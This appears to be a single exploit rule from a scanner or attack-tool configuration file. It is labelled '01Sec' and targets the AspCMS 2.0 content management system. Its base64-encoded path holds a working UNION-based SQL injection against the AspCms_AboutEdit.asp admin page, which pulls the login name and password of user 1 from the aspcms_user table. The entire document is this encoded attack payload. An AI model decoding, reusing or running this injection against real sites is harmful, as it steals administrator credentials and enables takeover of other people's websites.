[01Sec]
name = Aspcms2.0
cms = Aspcms
method = GET
path = L2FkbWluL19jb250ZW50L19BYm91dC9Bc3BDbXNfQWJvdXRFZGl0LmFzcD9pZD0xOSBhbmQgMT0yIHVuaW9uIHNlbGVjdCAxLDIsMyw0LDUsbG9naW5uYW1lLDcsOCw5LDEwLDExLDEyLDEzLDE0LDE1LDE2LDE3LDE4LDE5LDIwLDIxLDIyLDIzLHBhc3N3b3JkLDI1LDI2LDI3LDI4LDI5LDMwLDMxLDMyLDMzLDM0LDM1IGZyb20gYXNwY21zX3VzZXIgd2hlcmUgdXNlcmlkPTE=
post = 

